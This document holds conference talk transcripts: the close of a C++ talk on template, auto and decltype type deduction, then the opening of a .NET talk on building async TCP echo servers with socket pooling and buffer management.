I'll just remark that if you have an array or if you actually have, if you have the name of an array and you pass it to a template and you have a function name and you pass it to a template, there's special rules for dealing with array names and function names, and I'm going to pretend that we don't know that. So that's template type deduction, except for the weird special cases of array names and function names which really are truly edge cases. Any questions at all about anything to do with template type deduction? Did DK in the previous talk? Okay, great. So those of you who were in the talk, you know about DK. Any other questions about template type deduction? All right. So auto type deduction is exactly the same as template type deduction except if a braced initializer is used, you deduce an initializer list type. Those of you who are at my talk this morning have already seen this, so this will be not news to some of you. So if I have a template F which takes a parameter of type T and I call F with brace 123 close brace, this call to the template will not compile. The reason it will not compile is because brace 123 close brace does not have a type. Without a type, there can be no type deduction. But there's a special rule for auto. The special rule for auto, it's actually quite odd the way it's written in the standard. The rule for auto essentially says see that thing over there that has no type, pretend like it does. It doesn't have a type, but let's pretend. So if I say auto brace 123 close brace, the result of this will be X's type is now initializer list of it. That is the only difference between auto type deduction and template type deduction. Yeah. Okay, so essentially the question is why is there a special rule for auto? Okay, we can look at it a couple of different ways. Your question is why can't we deduce a type for it? The answer is I don't know. And if the question is asked a different way, which is okay, well, why does auto have a special rule? 
In that case, my answer is, I don't know. Which I find frustrating, because I have been trying to find out for literally two years. There's a rule in the standard. That means some human being wrote it down. That means the standardization committee voted to approve this particular rule. Somewhere, someone knows why this rule was added. For all I know, somebody wrote it when they were all really drunk. I don't know. If someone ever finds out why the rule is really there... I take it you would get an answer in two weeks. It's not really fair, because Nico's part of the library working group, but, you know, guilt by association: he knows who he can ask. Okay, that would be great. Okay, so in order to deduce that this is an initializer list of int, all the types have to be the same. If they are of different types, then type deduction will fail for that, too. But to answer your question, which is my question: I have no idea why they did this. So I'm not convinced they do either, but I will be thrilled. Absolutely thrilled. Okay. Now, if you start writing non-trivial templates, or using non-trivial templates, and you're like, okay, wait, sometimes we throw away the reference, but sometimes we add a reference, and then maybe we throw away the const, but not if the const is inside the type as opposed to outside the type, you can go crazy. It would be really nice if we could go: what freaking type is being deduced? It turns out we can do that. And it's really easy and unbelievably useful. What we do is we create a template class TD. TD stands for Type Display. Notice that I declare the template, but I do not implement it. So this is declaring a template; that's all it does. Now, in this particular case, I have a function template, and what I'm curious about is, every time I call this function template, I would like to know what types are being deduced. So what I'm going to do is declare a local variable called tType, of type TD of T.
Now, what's going to happen during compilation is the compiler is going to say, okay, I'm going to instantiate this template for T, and then it's going to go: wait a minute, I can't instantiate this class. There is no class to instantiate; it's only been declared. And then, in its own charming way, it will complain, and in the middle of that complaint will be the type you're looking for. It works better than you think. I mean, everybody who's programmed in C++ has seen horrible template error messages. These are not bad. I have some examples. Similarly, if I want to know what type is deduced for the parameter, then what I'm going to do is say TD of decltype of param. And I will have more to say about decltype shortly. But basically, what we do is we say: look, compiler, you know what param's type is, so I'm going to use whatever that type is to instantiate TD. So for example, if I have x is 22, and rx is a reference to a constant int, and I call f of rx... let me go back one slide. So I'm calling this template, and this template is going to cause this code to be compiled. So this is the template I'm calling, and I pass it rx. Now, notice that the parameter is a reference to a T, which means I use the rules for references. So what I've told you is that we'll throw away the reference and end up with const int, which means that T will be const int and the parameter type will be reference to const int. That's what I've told you. Why should you believe me? Let's see what the compilers have to say. So this is from GCC 4.8. It says: error, TD of const int has incomplete type. And then it says: error, TD of const int ref, paramType, has incomplete type. Well, this tells us exactly what we want to know.
This says that tType, the local variable, is an instantiation of TD of const int, which means the type T was deduced to be const int. And paramType: TD tried to instantiate TD of const int ref, which, number one, is really easy to read, and number two, agrees with me and therefore must be correct. What's that? Can I add one thing? Sure. There's a tool called Metashell, M-E-T-A shell, which is an add-on for the Clang compiler with which you can work interactively and find out the types during template metaprogramming. Oh, okay, cool. So that's also very helpful. So, the comment is that there is an extension for Clang called Metashell that permits you to inspect interactively the types that have been deduced during template metaprogramming. This is Visual Studio 2013. This is the old version of Visual Studio 2013; it was the current version yesterday, but they just released the new version. Even so: tType, T is const int. ParamType, T is const int, but notice that it's TD of T ref, so you have to put these two things together: this T is const int, but this is a ref to a T. So again, it gives you the same information as GCC does. And this is from Clang: TD of const int, TD of const int ref. I have found this to be extremely useful in trying to figure out what types the compiler is deducing. Yeah? So the question is, is there any way to get this at runtime? It all depends. Would you like an accurate answer, or an easy-to-get answer? Okay. Well, since you want an easy-to-get answer, then I recommend that you take an expression and then you call... what's it called? You need to get the type_info. You do typeid. Pardon me? Typeid, thank you. You do typeid of the expression; that gives you a type_info object, you can then call the name member function, and compilers will usually print out a pretty reasonable representation.
It's easy, it's relatively straightforward, and it is required under some conditions to give you the wrong answer. I am not kidding. It is required by the standard to produce incorrect information in some cases. Now, if incorrect information suits your purposes, that is one way to do it. If it does not suit your purposes, then you have to play some games and write some stuff by hand. I mean, it's not hard to do. I actually did do some work in that area for a while, but what I ultimately found was: why do I want to compile, link, and run a program in order for it to give me information that could have been delivered to me during compilation? So I believe it's better to use this incomplete template declaration instead, because it gives me accurate information, without my having to do any more work, earlier than I would get it at runtime. But to answer your question, it can be done; just don't rely on typeid. All right, so where were we? Decltype. The last thing I want to talk about is decltype. There are many rules regarding how decltype works, but I'm only going to talk about two of them, because they cover most of what you'll need to know. First, decltype of a name is the declared type of the name. Unlike auto, it never strips const or volatile, and it never strips references. Decltype of a name literally is the declared type of that name. There are no surprises: it spits out the declaration. So if I say int x is 10, well, decltype of x is int, exactly as you would expect. If I say rx is a reference to a const auto and it's referring to x, well, I've told you before that auto will deduce, in this case, reference to const int, because x is of type int; and decltype of rx is reference to const int. It doesn't get rid of the reference, and it keeps the const. It literally spits the declaration back out. And it's a compile-time analysis, right?
It's not a runtime thing. But it literally will give you exactly how the variable is declared. So that's decltype of a name. Now, there's another rule; I'm only going to talk about two rules, and here's the other one. If I have decltype of an lvalue expression that has a type T, then the resulting type is going to be T with an lvalue reference added to it. So the rule is: if you have an lvalue expression of type T, decltype will return to you T&amp;. Now, at first glance this sounds like it's adding a reference to a type which doesn't have one, but that's usually not the case. It turns out that most expressions that are lvalues, other than names, which we've already talked about, actually do have an lvalue reference in their type. So usually nothing's being added. So here's a function findVec: it returns an lvalue reference to a const std::vector of Widget. Notice that it's already returning an lvalue reference; that's what makes it an lvalue expression. If it didn't have the reference, it would be an rvalue expression. So normally no reference is being added, and, just for what it's worth, there are some very obscure situations, which are not going to affect anybody in this room unless you are writing compilers for fun, and under those weird conditions sometimes the lvalue reference really does get added. It turns out that, because of C, if I have a built-in array and I use the array bracket operator on it (this is only for built-in arrays), the language specification says the result is an lvalue of type T. It doesn't say it's a reference to a T; it says it's an lvalue of type T. Basically, it's not a reference.
As a result, if I do decltype of array[0], it actually will return int&amp;, because that's what it acts like. And I'm now going to skip over that, because really, unless you are writing compilers for a living, you will never care. There are a lot more rules for decltype. I will be honest, I don't even know what they are. I know that they exist, and I can look them up when I have to. But these two rules suffice for developers doing anything even remotely normal. I want to point out that a name is an lvalue. So if I say int x, x has a name, I can take its address; x is an lvalue. Variables are lvalues. So now we have these two rules in decltype. The first rule says decltype of a name just spits back its declared type. The second rule says decltype of an lvalue expression spits back the type with an lvalue reference added. These two things are a little bit in conflict, but the decltype-of-a-name rule beats the decltype-of-an-expression rule. So if I say decltype(x), well, x is a name, it's declared to be an int, so the result is int. But if I say decltype((x)), that's an expression. (x) is not a name, it's an expression, and that means the resulting type is int&amp;. Now at this point you don't care, because it's obscure information, and it's late in the day, and really, you know: parentheses, no parentheses, what's the point? In C++11 we had a limited kind of function return type deduction. In particular, for single-statement lambdas, the compiler would deduce the return type. Well, C++14 said: you know, this is a cool idea. So rather than limiting return type deduction to single-statement lambdas, let's make it available to every function, no matter how complicated, as long as the type can be deduced. So all lambdas plus all functions now get return type deduction if you ask for it, which means you'd better understand how that works. So there are two kinds of deduced return type specifications.
The first is: if you say the return type is auto, you get template type deduction rules. You don't get auto type deduction rules; that'd be too easy. Just remember, auto means template, unless it's for an object, in which case it means auto. The only difference between the two is the rule for braced initializers. If you say decltype(auto), that means use the decltype deduction rules. So we're not actually adding any new rules here, just two new contexts. Now, sometimes you actually want auto. As an example, here's a function lookupValue. What lookupValue is going to do is look up a value and return that value to the caller. That's what it's supposed to do. So here's lookupValue: it gets some context information as parameters, and what it does is declare a static vector called values, which is somehow initialized inside this code. So I've got a vector inside the function, and then I compute the index into values, so I find the appropriate entry in that vector, and then I say I want to return values[idx]. Now, in this case, I really want to return an int. Because if this thing returned a reference to an int, I would actually be returning a reference into the static vector inside my function. I don't want to give callers access to that static vector; I want to give them a copy of the int in it. I don't want to let them do this; I want this to not compile: lookupValue(contextInfo) = 0. If this thing returned a reference, that would compile, and it would modify the values in the vector inside the function. So for this code to do the right thing, I really want the return type to be just int, not a reference to int. So this is an example of a context where returning a value is the correct thing.
On the other hand, let's suppose I have a function called authorizeAndIndex. What authorizeAndIndex does is: you pass in some vector and an index, it authorizes the user to make sure they actually have the right to do this operation, and then it returns v[idx]. It does a normal indexing operation. Now here I really do want people to be able to modify the contents of the vector. Look, they passed in the vector; they clearly have access to it. Which means somebody should be able to say authorizeAndIndex with their own vector and the index 10, and after authorization it should then assign 0 to that location. Under these conditions, we really want a decltype(auto) return type, because we want to return a reference into that vector. auto would be wrong here. So there are legitimate uses for an auto return type and for a decltype(auto) return type. But it does have some interesting quirks. So here's lookupValue again. Let's suppose lookupValue has a decltype(auto) return type, which is suspicious, because we could have just used auto, but let's look at the function implementation. In the implementation, we have a static vector of values; we look up the return value, and then we return a copy of it. Now, in this case, values is a vector of int, so its contents are integers. So I look up values[idx]; that's going to be an int, so retVal is therefore of type int. So now I am returning retVal. Now retVal is a variable; it's just a name. Because it's a name, the decltype deduction rules will simply deduce the type int. They won't add an lvalue reference to it. So this code will work fine; it actually is returning a value, not a reference. Some people are in the habit of parenthesizing their return values. It's just something they do.
So if I take this implementation and put parentheses around this retVal, now it's no longer a name, it's an expression, which means decltype(auto) will slap a reference on it, which means what this is returning is a reference to an int. And in particular, it's returning a reference to this particular local stack variable. Which, by the way, is not illegal. It's just stupid. So this is legal code; with any luck you will get a warning that you are returning a reference to a local variable. But slight differences in the way that you write these things make a difference, so it's something to be aware of. The rule of thumb that I think is worth bearing in mind is: use auto if a reference type would never be correct. And I'm talking about auto by itself, because you could return const auto&amp;, and that would work too. And use decltype(auto) only if a reference type could be correct. Returning decltype(auto) does not guarantee you will get a reference; you might not. But it's important to understand that auto uses template type deduction rules, and decltype(auto) uses decltype deduction rules. And if you're looking for more information on this whole business of type deduction, you can read about it in these three things here. We have a couple of minutes, so I will ask: are there any questions about anything to do with type deduction? Yeah? So if you wanted to return an lvalue reference, it would be better to use auto&amp; instead of decltype(auto)? Because it's more readable? Okay, so the question is: if I wanted to return an lvalue reference, should I use auto&amp; as opposed to decltype(auto)? If you know for certain that you definitely want to return a reference, then I would use auto&amp;, because decltype(auto) doesn't guarantee it will return a reference. It depends on what the expression is that's being returned. So if you know for a fact that you really want to return a reference, then yes, use auto&amp;.
decltype(auto) can be useful in situations where you're calling some function which is overloaded, where some of the overloads return a value and some of the overloads return a reference. That can happen with the array bracket operator, and I talked this morning about proxy classes. So if, for example, you were indexing into a vector and you want to return whatever you get back: if it's a vector of bool, you want to return a value; if it's a vector of anything else, you want to return a reference. decltype(auto) is perfect for that. But if you know you always want to return an lvalue reference, I would go with auto&amp;. Any other questions? All right. Well, thank you very much. And, both for me and for the conference, please pick up the appropriate color piece of paper and throw it in the bin on your way out. Thanks very much. Thank you.
C++98 had template type deduction, and it worked so intuitively, there was little need to understand what took place under the covers. C++11 extends type deduction to include universal references, applies it to auto variables and lambda expressions, then throws in a special auto-only deduction rule. C++14 pushes the boundary further, adding function return type deduction to arbitrary functions and offering auto parameters for lambdas. The result is that what could be treated as a black box in C++98 has become a topic that practicing C++ developers really need to understand. This talk will give you the information you need to do that.
10.5446/50605 (DOI)
So, I guess we may as well start. Hi everyone. My name is James Nugent. I work for a company called Event Store. I'm actually quite surprised and impressed with the turnout for a talk that's up against Scott Hanselman, Douglas Crockford, and James Newton-King, so thank you for coming. So the title of this talk is TCP Servers Done Right. What I'm going to qualify that with is: for some definition of right. We're going to be looking at .NET code. We're not going to get it up to the performance that you could conceivably get out of native code, mostly because I am not convinced that's possible, but specifically we're going to be looking at stuff that works well on Windows, and I'll point you towards some stuff that works well on Mono as well. And secondly, we're going to spend most of the time looking at async TCP, which may or may not be the best choice for you. There's a debate that's been going on for quite a while, and it's basically settled, I think, about whether blocking calls with a thread per client, or asynchronous I/O, is the best way of dealing with things. And it turns out that if you want the best performance for one client and you have a relatively small number of them, you may actually be better off with the thread-per-client model. I'm not going to show an example of that, but it's a fairly trivial extension to one of the examples we will look at. If people are interested in the code that we look through, then I can stick that up on GitHub. The big thing we're going to look at at the end is open source anyway, and that's already on GitHub, so I can point you towards that.
So basically what we're going to go through is refactoring the same code, from being a basic synchronous server which will only deal with one client at a time, to making it deal with multiple clients; then looking at the memory implications of what we're doing and considering how that will scale up to lots of clients; and then we'll try to wrap things up in a slightly nicer abstraction for the purposes that we need. And then we're going to skip away from sample code and go and look through some real-life code from a database server capable of doing 60,000 to 70,000 transactions a second over TCP, which is the Event Store. This is going to be very code heavy, so in fact I'm going to lose the slides for now and switch to code. Actually, there's one more. So the basic abstraction in .NET for all this stuff is the Socket class. It covers most of what we need. There are various people who've tried to wrap native things like libuv in managed code and call them directly; they've had variable results. It seems that there is some mileage in that, but we're not going to really look at that today. We're going to stick with the native .NET stuff, which you can get to a reasonable throughput, if that's what you need. So let's switch over to code, because that's more fun. The first example I have here is just a program that's calling this server class and running it on the main thread. All we're going to do is use the Socket class. We're going to bind to this endpoint, so we're going to bind to 127.0.0.1 on port 11000. We're going to bind for IP, and we're going to use the stream socket type. There are various other types here, so we could go and use, for example, datagrams and that kind of thing, but we're going to stick to stream stuff for all of our demos today. We're going to use raw TCP.
So, running synchronously with these two methods: Bind is going to set up the socket to bind to the given endpoint that we've defined up here, and then Listen is going to start listening for connections. Then a little bit of error handling; we'll talk more about error handling later on. Then we're going to go into this main loop, which is going to keep running until we terminate the server. All that's going to do is accept a connection. There's a difference between listening for a connection and, when one appears, accepting it to get hold of a socket that we can talk to. At that point, what we're going to start doing is listening for data that the client sends and immediately sending it back to them. This is going to be a pretty horrible echo server, because it's going to do things literally as we type. Then we're eventually going to close the client socket if they send nothing. If we run this for a few minutes, we can see what some of the characteristics are. I'm going to use telnet as the client for all of this stuff, because it's nice and straightforward. If we start a session, then we can see we're handling this client at the moment, so we're somewhere here in the code. If we start typing away, hello world, then we start to see that exactly what we type is being echoed back to us, which is kind of what we'd expect. If we fire up a second one of these, then, as we're probably expecting, nothing's going to happen. We're not going to see that we're handling another client, and if we type in here, nothing happens. In fact, if we terminate the first client, so Ctrl+] and then quit, we will actually see that this one eventually connects, because it's been sat in a queue. The telnet client has buffered all the input that we've given it, and it sends it across when it finally does connect, which is nice: we get back whatever random stuff I typed into that box.
We can see that this is fundamentally one client at a time, which might occasionally be what you want. If you're doing thread-per-client, then that's basically exactly what we want, and this is the exact model you'd use for that: spawning up a new thread on every accept. But as it stands at the moment, we can only really handle one client at a time, and everything's being done on our main thread, which is probably less than ideal. In order to get around that (I need to Ctrl+C out of it to get rid of it), we need to start somewhere up here. As with most methods on this class, there are two different variants: there's Accept, and there's also AcceptAsync. AcceptAsync is going to take... in fact, let me open up the project that's got that in. I decided that live coding this stuff was a very bad idea, so most of the examples are canned. What I've done here is just split it out into... oh, it's still in the same kind of thing. After we listen, we're going to start accepting, for some number of concurrent accepts. That's just a constant that's defined up here; I think it's one at the moment, but you can make it any number that you like. There's a trade-off between how long your queue is and whether you want clients to wait for a long time or disconnect. When we start accepting, what we're going to do is create this SocketAsyncEventArgs object, which gets given as a parameter to AcceptAsync. It has various things that we can define on it, and one of the things it defines is this Completed event handler. What that's going to do is call our delegate when we get a client connecting. So what we're going to do here is just hook it up to something that's going to handle it, which we'll look at in a second. Then, because it's an async call, it's possible that it will return immediately.
For example, if our queue is backed up with clients trying to connect, the chances are the call will complete immediately and we'll never get the async event fired, because that's how the pattern works: if it doesn't go async, we just call the handler synchronously ourselves. It's also possible that a client opens a connection and then disconnects before we have time to service it, in which case there are various conditions that can lead to these ObjectDisposedExceptions. There's not really much you can do about it if this throws when we try to close the socket down. In this case, I've just got a little helper method called Eat, which will ignore that without having to appease ReSharper or use an empty catch. When we get a connection, what we're going to do is close it immediately, basically. We're going to see if the accept was successful, then we're just going to log the fact that we accepted it, and where the connection came from, and then close the connection down. Then we're going to start accepting again immediately. This is what will cause the thing to loop and continue to allow us to service clients. If we run this, it will be the world's most irritating server, because you'll connect to it and then it'll immediately disconnect. I occasionally suspect that that's how they implemented iMessage, by the way. If we do this, then, you know, telnet 127.0.0.1 11000, what we should see is that we started processing an accept from this address and then we immediately closed it. What's this port? This is one of the ephemeral ports that gets used for client connections. You can configure the range of ports which will be used to service client connections, and, in fact, how many ports are available for that, which determines, in part, how many concurrent clients you can deal with. There are Windows settings for doing that, which, as far as I'm aware, .NET will obey.
We immediately closed the thing anyway. The telnet client detected that and just shut itself down. If we could keep it open for long enough (if I hadn't blocked the server by highlighting it), then we should be able to keep doing that. And if we were staying open for long enough, we should actually be able to have multiple clients connect to this, because we're not blocking the thread while it's waiting to receive. That leads us to a few things here. The first is: if you imagine that we were expecting quite a few clients to be accepted, then it would be pretty poor to be allocating these SocketAsyncEventArgs objects every time; every time we want to accept a new client, we have to allocate one of these on the heap. As far as I'm aware, that's a class. Maybe it's a struct... no, I don't think it is. It's a class. Goodbye, ReSharper. We probably don't want to be doing that. One of the common patterns that we're going to see here is the need to do some manual memory management. Who here works with .NET all the time? Who remembers being told, when .NET came out, that garbage collection meant you don't ever have to deal with memory yourself? That's the most dangerous thing ever. All the normal memory management patterns still apply; it's just that you don't have to keep track of things yourself all the time. It turns out that if you're into this kind of stuff, and in particular if you're doing a lot of native calls, then actually you do have to worry about this stuff. I'm going to pull up the next thing here, which has a slightly different version of that. What we've introduced here is the idea of a pool. What that's going to do is determine some number of these objects that we think we're going to need over time, allocate a whole load of them in advance, and then make them available via a pair of methods. One is Get, which you use when you want to get one of them.
The other one is Return, which you call when you're done with it. In other words, you say: I want to use this object temporarily; you use it for the duration of the period that you need it, and then you return it to the pool and somebody else can use it. It's implemented in a fairly straightforward manner. The objects are sitting on a ConcurrentStack, which, if you look into the memory usage profiles, is marginally better than a concurrent queue for this, just because you tend to reuse the same objects more often. When we create the pool, what we're going to do is go through and just create a whole load of them. We're actually not going to create them directly in here; we're going to allow the consumer of this class to pass in a Func, which determines how the objects get created, which, as we'll see, is going to be useful in a second. Then when you get one, you pop the last one off the stack, and when you return it, you push it back on. It's a fairly straightforward class. If you're using Mono, this is one of the areas where you need to pay a bit of attention, because the ConcurrentStack is not very concurrent. This may be fixed now, but certainly as of 3.2.8, I think it was, it was still not very good. I can post some ways of getting around that that we're using in the Event Store. So what we can see, if we go back to our server, is that when we start up, we're going to create one of these pools. The initial number that we're going to use is basically the number of concurrent accepts we're going to allow, times two, on the basis that that way there should always be enough on the stack: even if every one of them was taken by an accept that's running, by the time we want another one, there should always be one there, because they get returned pretty quickly. The Func we're going to use is actually a method rather than a lambda, but what we're going to do is hook our own delegate into this Completed event.
Other than that, the code is pretty much the same. We've just factored out the exception handling code. It's very important to make sure that we actually return the thing to the pool. So even in the case of errors, we really want these objects to get returned to the pool and not lost in the depths of time. So whether we're successful or whether we're in an error condition, we need to make sure that we haven't left any of our own data in these objects, which are going to be reused, and we need to return them to the pool. In this particular case, when we use AcceptAsync, that's going to set the accept socket so that we can do further work with it. Now, when we return this to the pool, we don't really want it carrying somebody else's accept socket, because, apart from anything else, it means that socket will never get garbage collected. So we need to be very careful to set that to null wherever we return these things to the pool. Apart from that, we've changed the server a bit so that it doesn't just disconnect, because that was really annoying. So what we've done instead is, in our little server, when we construct this thing (when we start listening, sorry), we're going to take an action: what should we do when the socket gets accepted? And just for convenience's sake, we're going to give the action both the remote endpoint, so that we have some easy way of identifying the client temporarily, and also the actual socket object itself, so that it can make calls down to it. So if we go back to our program, which is the eventual consumer of this class, what we can see is that (I'm running a background thread just so that I can exit it more easily) we're going to create the server, and when we start it, we're going to pass it this handleConnection delegate. And for now, all that's going to do is, well, nothing: it's just going to sit there with the connection open.
And this should prove to us that we're actually capable of accepting multiple clients at the same time. So if we run this... telnet; I don't know why these windows come up so big. So we're going to sit there, and we can see we've got one client that's been accepted, from that ephemeral port. And we can probably go ahead and start another one, and, if I'm not mistaken, it should connect. So we're now capable of handling multiple connections at the same time, which is an improvement on our synchronous version. And we're also not causing horrific memory problems yet. There's actually an interesting tip here: if you ever get hit by it, the chances of you ever getting hit by it are fairly minimal; if you are, it will troll you for an entire week. It's entirely possible, if you're making and breaking lots of connections in a very fast cycle, that you can end up connecting to your own TCP port (you can see it in netstat), and it will connect, and it will look okay, and nothing will work. We literally spent about a week looking for this in the Event Store. It was one of the worst trolls we've had in the entire development process. But anyway, so we've got multiple connections. So if we go through and break some of those, now we can access our server properly as well. So let's go make it do something a bit more useful than this. Fortunately, because we've got the socket, we can start to use the client socket (sorry, not the client endpoint). And then, okay, so what do we do? There are a few options here. Basically, what we want to do is: when a client connects, we want to start listening for data, because (the whole point of an echo server) they're going to send us something and we're going to send it back. I'm going to use echo all the way until the end of this talk, because it's a nice, easy protocol that everybody understands. So we have a few options here.
We have Receive, which is fine. That's going to block, though, so we don't really want to use it, because we're still running single-threaded here, remember. We've got ReceiveAsync, which takes one of the SocketAsyncEventArgs objects again. That's a valid option, but that's using the event-based asynchronous pattern from .NET; I think that was introduced with .NET 2 or something like that. Instead, what we're going to look at is BeginReceive. This is generally a lot more useful. If we look at the signature for this (if it will stay up while I'm zoomed in, which it won't): BeginReceive. Basically, what we've got to give this thing is a buffer to write into. So we're going to say to the socket: start receiving data from this client and put it here. And we're going to give it somewhere to put the data. I'm not going to implement that here; I'm going to go on to the next example, because that way I don't have to type all that. How do I do this again? What number was that? That was three. So let's look at number four. This one now has a lot more files in it. So, the problem with using the BeginReceive approach... in fact, let's go and type some of that code, just to see the motivation behind wrapping this up in a slightly nicer model. If we actually go and do this, we could say here that we're going to allocate a byte buffer: say var buffer = new byte[1024], so we're going to give it a kilobyte buffer to write into. And then we're going to call clientSocket.BeginReceive, and we're going to pass it the buffer, and an offset into the buffer (zero in this case), and say we're going to receive 1,024 bytes with no flags. And when we're finished, we're going to have a ReceiveCompleted callback. And we don't need any state. Actually, we do need some state: we need the socket.
So if we generate out this method, this is just using the standard pattern that's been there since .NET 1.0 or 1.1; it's been there for a long time, anyway, and a lot of stuff implements it. The point is, when we get the callback, we can get our socket back via the IAsyncResult's AsyncState property, and then, you know, we could go and do something with it. The problem is, what we don't have is the buffer. So, you know, we could go and write a tuple here, or we could go and write our own custom object to put into the state. The point is, once you start implementing this pattern, you end up writing quite a lot of code that's quite convoluted. Instead, it would be nice if we could interact with the thing by basically registering our own callbacks for complete messages being received over TCP, and where we could enqueue sends rather than having to block waiting for them, et cetera. So in this model (I've basically pulled some of this code out of the Event Store code base), the central abstraction we've got is this thing called a TcpConnection, and what that represents is one client. And it has some methods that we can use. So we can use EnqueueSend if we want to send something, or we could do a TrySend if we think it might fail for some reason. And we have our own version of ReceiveAsync that's going to take our own callback, so that we don't have to bother passing around these buffers. Internally, that's exactly what it's going to do. But let's see how we use this thing. I'm not going to go into the implementation details of that. It's actually a lot more complicated than it needs to be for our simple purposes here, because it does a lot of monitoring on the connection. So it will track, for example, the total number of bytes written to and read from a connection, and it will monitor various other aspects of it that we needed for other things. And pulling out that code was just too painful, so I left it in.
But if we go and look at how our server actually uses this, what we can do is write these nice callbacks instead. We can say, once our connection has been accepted, which is exactly what was happening before, we're going to create a little abstraction over this client. And we're going to give it an identifier so that we can get back to it easily later on, and we're going to give it the endpoint, and we're going to give it the socket. And we're going to use verbose logging for now so that we can see what's going on underneath. And at that point, when we do ReceiveAsync, we're calling ReceiveAsync on our abstraction rather than on the actual socket, which is a bit of a clumsy API. So what we're going to be able to do is say, is this. So when we receive data, we're going to get back an IEnumerable of ArraySegment. Who's seen the ArraySegment class before? Sorry, the ArraySegment struct before. Okay, cool. So the ArraySegment struct is basically a flyweight over an array, or over part of an array. It's a way of passing around a reference to it which you can iterate over. Let's go look at it. It's basically a way of allowing you to iterate over the contents of an array, or over a part of an array, and treat the whole thing as if you had an actual slice of the array, if you like. So because we want to be nice and efficient underneath, we're going to be writing into a pre-allocated array, which we'll look at in a second. So we're going to get some data back which is going to be a reference to, you know, we don't know where it is. It's not in a buffer that we've allocated anymore. And all we're going to do is send it back and start receiving again. This is basically the pattern of most servers, right? They're going to wait for a request, they're going to process the request, they're going to send a response back. That's the case for most protocols.
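As a small aside, the slicing behaviour of ArraySegment can be shown in a few lines. The segment is just an (Array, Offset, Count) triple, so iterating it reads the original array with no copy being made:

```csharp
using System;

static class ArraySegmentDemo
{
    // Sums a slice of a pre-allocated buffer through an ArraySegment.
    public static int SumSlice()
    {
        byte[] pool = { 1, 2, 3, 4, 5, 6 };
        var slice = new ArraySegment<byte>(pool, 2, 3); // refers to 3, 4, 5

        int sum = 0;
        for (int i = slice.Offset; i < slice.Offset + slice.Count; i++)
            sum += slice.Array[i]; // reads straight from the underlying array
        return sum;
    }
}
```

Because nothing is copied, handing out segments over one big shared buffer is effectively free, which is what makes the pooling scheme described later work.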
The protocol that we're going to look at right at the end is actually not like that; it's fully asynchronous, so it sends responses out of order with correlation IDs on them instead. But now we're back to, basically back to our echo server. And we've added this extra thing which will hook up a connection-closed handler and just log when the client drops. So if we go look at this and run it for a second, we should be able to get a client up, and we should be back where we were with our synchronous version, on the same port number. So now if we type, you know, we should be getting a test thing, we should be getting our data back at us. And then if we close, we should, oh, how do you even close? Thank you. Then we should see some information about our socket. So we've been monitoring various things about it, like the number of send calls. This can be useful during debugging. So how does that help us? Well, one of the things that we need to be very careful of, I'm going to go back to slides very briefly, and this is the last time, I promise. One of the things we need to be really careful of is heap fragmentation. We called a lot of begin sends, begin receives, sorry. Now BeginReceive is an interesting thing, because we have to pass it a buffer. And when we started this, we were allocating our own buffers, right? We were saying here's a new byte array that we're going to declare, and it's going to be allocated on the heap, and we're going to pass it to this method. And we were passing relatively small buffers, you know, they were 1,024 bytes. So they're probably going to be in generation zero, or in the nursery if you're on the Mono garbage collector. So the problem with that is, if we go and look at our heap for a second, let's imagine we have a whole load of objects, and the red ones have been passed to a BeginReceive call. Oh, I'm using the terms from the Mono garbage collector there rather than the .NET one, but yeah, same principle.
The problem is, BeginReceive is basically a wrapper around a native call, right? It's going to do some interop, and the actual network stack is going to have to be writing into this memory. So what happens is the garbage collector pins that memory, which says basically you're not allowed to move this when you do the garbage collection. Who's heard of the concept of pinning memory before? Okay, cool. So the problem is, if you've got pinned memory, then you can end up with really badly fragmented memory. If you imagine that we go through all these other objects, which, in grey, are basically free to be collected, then when we go through our next garbage collection cycle, our heap is going to look like this. Now what happens when we want to allocate an object of this size? It won't fit in any of those gaps. There's plenty of free space for it, but there's no contiguous space big enough for this object to fit, because we've got a load of things that we're not allowed to move, because the operating system is expecting them to be in a certain place. Unfortunately, we're not allowed to just squeeze some memory into a box that's just about the right size. So how can we deal with that? Basically, the abstraction that we want to use is very similar to the SocketAsyncEventArgs pool that we looked at earlier. What we want to do is pre-allocate a whole load of buffers that we can use and distribute out amongst calls. Ideally, we want to be allocating a lot of memory, because if we do that, it'll end up on the large object heap, where it's less likely to cause us problems with transient objects. So let's go and look at the implementation of that. We have this thing called BufferManager, and what that's going to do, when I get down to the meat of it, is go through allocating chunks of memory, and they're going to be chunks that are on the large object heap.
So it's basically going to declare byte arrays big enough, so bigger than 85 kilobytes on the CLR, to be stuck in the large object heap. Then it's going to chunk that up into, well, it's going to create array segments over this which are big enough to be useful. Basically, when we do these BeginReceive calls, we basically always want the same buffer size. We're going to decide what a useful size for our particular use cases is, and we're going to start, you could do it slightly differently so that you can have variable-size buffers as well, but for the most part, we're going to want fixed-size buffers. We're going to stick them again onto a stack so that we end up reusing them. In this particular case, this implementation of it also allows it to allocate further memory if necessary, so if we're doing so many calls that we've run out of the initial amount that we allocated, then we can allocate new slabs further down the heap. But this ArraySegment thing allows us to transparently give out slices of the big pool of memory we've allocated to all these BeginReceive calls. So now when they pin it, it doesn't matter; we're not going to get heap fragmentation as a result of that. Unfortunately, it's quite a pain to, you know, it's another motivation for having this TCP connection abstraction: it's quite a pain to go through and make sure you return all the buffers when you're finished with them. Quite often, you're going to be holding onto them for a while until you've got enough to satisfy what you're actually listening for. When you go through implementing protocols, for example, the AMQP protocol is sent on the wire with frames which are delimited by, you know, you send the length of the frame and then you send the actual data. And you wait until you've got a whole message before you start processing the message further downstream. So this is quite a useful place to start buffering that.
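A minimal sketch of the slab idea just described might look like this, assuming a fixed segment size and a ConcurrentStack of free segments. The names are illustrative; the real BufferManager in the Event Store code base is more elaborate, for instance it can grow by allocating further slabs instead of throwing when exhausted:

```csharp
using System;
using System.Collections.Concurrent;

// One large allocation (sized past the large object heap threshold in real
// use) chunked into fixed-size ArraySegments that are checked out and back in.
class SlabBufferPool
{
    readonly ConcurrentStack<ArraySegment<byte>> _free =
        new ConcurrentStack<ArraySegment<byte>>();

    public SlabBufferPool(int segmentSize, int segmentCount)
    {
        var slab = new byte[segmentSize * segmentCount]; // single big allocation
        for (int i = 0; i < segmentCount; i++)
            _free.Push(new ArraySegment<byte>(slab, i * segmentSize, segmentSize));
    }

    public ArraySegment<byte> CheckOut()
    {
        ArraySegment<byte> seg;
        if (!_free.TryPop(out seg))
            throw new InvalidOperationException(
                "pool exhausted (a fuller version would allocate a new slab)");
        return seg;
    }

    public void CheckIn(ArraySegment<byte> seg)
    {
        _free.Push(seg); // returned segments get reused by later receives
    }
}
```

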